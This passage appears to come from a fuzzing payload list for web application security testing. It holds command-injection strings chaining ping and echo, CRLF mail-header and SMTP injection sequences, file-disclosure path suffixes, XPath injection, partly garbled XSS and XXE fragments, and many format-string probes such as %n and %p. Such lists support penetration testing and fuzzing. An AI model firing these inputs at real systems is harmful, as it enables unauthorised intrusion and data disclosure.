439 | | ping -n 30 127.0.0.1 |
440 | & ping -i 30 127.0.0.1 &
441 | & ping -n 30 127.0.0.1 &
442 | ; ping 127.0.0.1 ;
443 | %0a ping -i 30 127.0.0.1 %0a
444 | `ping 127.0.0.1`
445 | ;echo 111111
446 | echo 111111
447 | response.write 111111
448 | :response.write 111111
449 | http:///
450 | %0aCc:
451 | %0d%0aCc:
452 | %0aBcc:
453 | %0d%0aBcc:
454 | %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a
455 | %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
456 | # known cross-platform source-code and file-disclosure attack patterns - append after a file or directory path
457 | %70
458 | .%E2%73%70
459 | %2e0
460 | %2e
461 | .
462 | \
463 | ?*
464 | %20
465 | %00
466 | %2f
467 | %5c
468 | count(/child::node())
469 | x' or name()='username' or 'x'='y
470 | var n=0;while(true){n++;}]]>
471 | SCRIPT]]>alert('XSS');/SCRIPT]]>
472 | "SCRIPT]]>alert('XSS');/SCRIPT]]>"
473 | ""
474 | "]>&xxe;"
475 | "]>&xxe;"
476 | "]>&xxe;"
477 | "]>&xxe;"
478 | "]]>"
479 | " cript:alert('XSS')"">"
480 | ""
481 | "XSS"
482 | %00
483 | NULL
484 | null
485 | '
486 | "
487 | ;
488 |
498 | ">
499 | %0d
500 | %0a
501 | %7f
502 | %ff
503 | -1
504 | other
505 | %s%p%x%d
506 | %99999999999s
507 | %08x
508 | %20d
509 | %20n
510 | %20x
511 | %20s
512 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
513 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
514 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
515 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
516 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
517 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
518 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
519 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
520 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
521 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
522 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
523 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
524 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
525 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
526 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
527 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
528 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
529 | XXXXX.%p
530 | XXXXX`perl -e 'print ".%p" x 80'`
531 | `perl -e 'print ".%p" x 80'`%n
532 |
--------------------------------------------------------------------------------
|